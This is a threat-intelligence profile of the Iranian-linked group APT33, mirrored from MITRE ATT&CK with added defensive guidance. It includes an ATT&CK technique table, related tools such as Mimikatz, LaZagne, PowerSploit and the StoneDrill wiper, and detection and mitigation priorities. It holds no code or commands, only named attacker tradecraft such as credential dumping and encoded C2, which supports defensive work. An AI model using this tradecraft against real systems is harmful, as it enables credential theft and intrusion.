G0064: APT33
Analyst context for executives and security teams
APT33 matters because MITRE describes it as a suspected Iranian group active since at least 2013 with reported targeting across the United States, Saudi Arabia, and South Korea, especially aviation and energy. The relationship set is operationally important: it links the group to credential-dumping, PowerShell/post-exploitation frameworks, remote access tools, FTP transfer, Exchange/Office abuse tooling, and wiper malware. For leaders, the decision value is not the name alone; it is whether identity controls, Windows endpoint visibility, email security, remote access monitoring, and recovery plans can withstand the behaviors represented by these relationships.
Executive priority
Prioritize APT33 as a threat-intelligence-informed readiness driver if the organization operates in aviation, energy, Saudi/U.S./South Korea exposure, or environments where IT compromise could affect operational technology. Executive questions should focus on: can the SOC prove visibility over credential theft and PowerShell activity; can IR contain compromised Windows credentials quickly; are destructive-malware recovery assumptions tested; and do audit/compliance records show controls over email attachments, privileged accounts, logging, segmentation, and backups?
Technical view
MITRE provides no official detection text for the group, so defenders should build coverage from the related software and techniques. Validate detections for Windows credential access involving LSASS memory, LSA Secrets, and cached domain credentials; command-line use of Net and ftp; PowerShell-heavy frameworks such as PowerSploit, Empire, PoshC2, and POWERTON; RAT/backdoor families including NETWIRE, NanoCore, Pupy, TURNEDUP, and AutoIt backdoor; Exchange/Office abuse associated with Ruler; obfuscated or encoded files; and network sniffing behavior where relevant. The ICS relationships for screen capture, scripting, and spearphishing attachment make OT-facing monitoring and phishing controls relevant where control-system environments exist.
Likely telemetry
- Endpoint process creation, command-line, parent/child process, module load, and script execution logs, especially on Windows systems
- PowerShell logging and administrative shell telemetry
- Windows security events and EDR signals related to LSASS access, registry access to LSA Secrets, and credential-dumping tools such as Mimikatz and LaZagne
- Email gateway, attachment detonation, and user-reporting telemetry for spearphishing attachments
- Office Suite and Exchange service logs relevant to Ruler-like abuse
Detection direction
- Correlate across aliases APT33, HOLMIUM, Elfin, and Peach Sandstorm so intelligence, case management, and SIEM content do not fragment the same ATT&CK group reference.
- Do not rely only on malware names. Several related tools are public or legitimate administrative utilities, so detection should combine behavior, execution context, privilege level, destination, and sequence.
- Tune for credential-access chains: suspicious LSASS access, LSA Secrets access, cached credential access, followed by lateral movement or remote administration activity should receive higher priority.
- Validate PowerShell and scripting coverage because multiple related tools and backdoors use scripting or PowerShell-style post-exploitation.
- Review false positives for Net, ftp, PowerSploit, Empire, PoshC2, Pupy, and other dual-use tools by comparing expected administrative baselines with unusual hosts, users, timing, and network destinations.
Mitigation priorities
- Start with identity hardening: restrict privileged access, reduce credential exposure, monitor administrative accounts, and limit cached or reusable credentials where operationally feasible.
- Harden Windows endpoints against credential dumping and unauthorized access to LSASS and sensitive registry secrets.
- Constrain and log PowerShell, scripting interpreters, and command-line administrative utilities without blocking legitimate operations blindly.
- Strengthen email attachment defenses, user reporting, and investigation workflows for targeted phishing scenarios.
- Control outbound transfer paths such as FTP and monitor unusual remote administration traffic.
Analyst notes and limits
This take is based on MITRE ATT&CK group G0064, its aliases, official description, external references, and supplied relationship context. The most useful defensive interpretation comes from the related software and techniques rather than from a group-level detection field, which is not provided. APT33 should be used as a threat-informed planning scenario, especially for aviation, energy, identity, endpoint, email, and recovery readiness.
MITRE does not specify group-level platforms, tactics, or official detection guidance for this object. Relationship descriptions include multiple public, dual-use, and cross-platform tools, so local baselines are required before treating activity as malicious. The supplied data supports historical targeting and relationships, not current exploitation, confirmed attribution in a local incident, or guaranteed detection coverage.
APT33
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1552.001 | Credentials In Files Sub-technique | |
| Enterprise | T1003.005 | Cached Domain Credentials Sub-technique | |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | |
| Enterprise | T1552.006 | Group Policy Preferences Sub-technique | |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | APT33 has used base64 to encode payloads.CitationFireEye APT33 Guardrail |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | |
| Enterprise | T1110.003 | Password Spraying Sub-technique | |
| Enterprise | T1003.004 | LSA Secrets Sub-technique | |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | |
| Enterprise | T1555 | Credentials from Password Stores | |
| Enterprise | T1546.003 | Windows Management Instrumentation Event Subscription Sub-technique | |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique | |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1040 | Network Sniffing | |
| Enterprise | T1071.001 | Web Protocols Sub-technique | |
| Enterprise | T1059.001 | PowerShell Sub-technique | |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1078 | Valid Accounts | |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | APT33 has used AES for encryption of command and control traffic.CitationFireEye APT33 Guardrail |
| Enterprise | T1059.005 | Visual Basic Sub-technique | |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | APT33 has used base64 to encode command and control traffic.CitationFireEye APT33 Guardrail |
| Enterprise | T1571 | Non-Standard Port | |
| Enterprise | T1078.004 | Cloud Accounts Sub-technique | |
| Enterprise | T1203 | Exploitation for Client Execution | |
| Enterprise | T1204.002 | Malicious File Sub-technique | |
| Enterprise | T1204.001 | Malicious Link Sub-technique | |
| Enterprise | T1068 | Exploitation for Privilege Escalation | APT33 has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.CitationFireEye APT33 Guardrail |
Groups, software, and campaigns
S0194: PowerSploit
PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [1] [2] [3]
S0129: AutoIt backdoor
AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. [1] This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.
S0378: PoshC2
PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[1]
S0358: Ruler
S0002: Mimikatz
S0336: NanoCore
S1134: DEADWOOD
S0380: StoneDrill
StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.[1][2]
S0371: POWERTON
S0349: LaZagne
S0199: TURNEDUP
TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware. [1] [2]
S0198: NETWIRE
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.0 | Current bundle | 8bce83bff7b0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
FireEye APT33 Sept 2017
O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
Open source URL -
[2]
FireEye APT33 Webinar Sept 2017
Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.
Open source URL -
[3]
Symantec Elfin Mar 2019
Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
Open source URL -
[4]
Microsoft Holmium June 2020
Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
Open source URL -
[5]
APT33
(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)
-
[6]
Elfin
(Citation: Symantec Elfin Mar 2019)
-
[7]
HOLMIUM
(Citation: Microsoft Holmium June 2020)
-
[8]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[9]
Peach Sandstorm
(Citation: Microsoft Threat Actor Naming July 2023)
-
[10]
mitre-attack G0064Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.